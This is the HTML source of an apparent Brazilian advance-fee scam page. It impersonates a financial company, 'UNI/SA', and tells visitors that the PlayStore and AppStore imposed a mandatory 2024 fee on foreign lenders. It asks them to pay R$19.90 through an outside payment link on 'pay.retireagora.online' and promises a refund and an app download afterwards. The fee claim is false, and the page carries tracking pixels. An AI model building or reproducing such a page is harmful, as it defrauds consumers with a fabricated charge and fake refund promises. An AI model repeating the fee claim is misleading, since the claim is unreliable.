<html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Uni - Faça seu Cartão</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/style.css">

    <style>
        html, body {
            height: 100%;
            margin: 0;
            display: flex;
            flex-direction: column;
        }
        .main-content {
            flex: 1; /* Faz com que a main-content cresça para ocupar o espaço disponível */
            max-width: 450px;
            margin: 30px auto;
            padding: 20px;
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.1);
        }
        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            padding: 10px 0;
            padding-top: 10px;
            padding-bottom: 10px;
            position: relative !important; 
            width: 100%;
            bottom: 0;
        }
        ul li {
            padding-top: 7px;
        }
    </style>
    
    <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-subids
    async
    defer
  ></script>
  
<script>
  window.pixelId = "66bb763debbcebab27d68442";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="https://cdn.utmify.com.br/scripts/pixel/pixel.js"></script>
    
</head>

<body>
<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">   
    <div class="header">
        <img style="width: 120px;" src="https://i.imgur.com/Q0PyyEg.png" alt="Imagem Centralizada">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 18px;" class="main-content text-center">
        <h1 style="color: #27ae60;">Perfeito! Vamos lá...</h1>
        <p>No ano de 2024 as lojas de aplicativos <strong>(PlayStore e AppStore)</strong> criaram uma tarifa obrigatória para toda financeira estrangeira que possui atuação no Brasil, que é nosso caso. Esta tarifa tem o objetivo de inibir possíveis fraudes.</p>
        <p>Nós da <strong>UNI/SA</strong> não achamos justo ser cobrado este valor de nossos clientes, por isso todo valor pago nesta tarifa será reembolsado na sua <strong>Conta Digital UNI</strong>.</p>

        <div style="background-color: #f5f7f9;" class="card p-3 my-4">

            <p style="color: #e6007e;font-weight: 600;">Não se preocupe, este valor estará disponível na sua conta digital, assim que você baixar seu aplicativo.</p>
            <p>O link para baixar o App será liberado imediatamente após o pagamento.</p>
 
            <div class="text-center">
                
            </div>
            
        </div>

        <h3 class="text-pink"><strong>R$ 19,90</strong></h3><a href="https://pay.retireagora.online/zj6aGn0Ynxk3wlK" style="text-decoration: none;" id="7c12fc44-d9b0-b81f-7fa8-c220c3779c57">
          <button type="button" id="ativarConta" class="btn btn-custom rounded-pill w-100 mt-3">Quero baixar meu aplicativo</button>
        </a>

        </div>
    </div>    

    <div class="footer py-4">
        © 2024 Uni S/A. CNPJ 39.433.535/0001-91. <br>
         Avenida Presidente Wilson, 9, São Vicente/SP - CEP 11320-905
    </div>
</div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>


</body></html>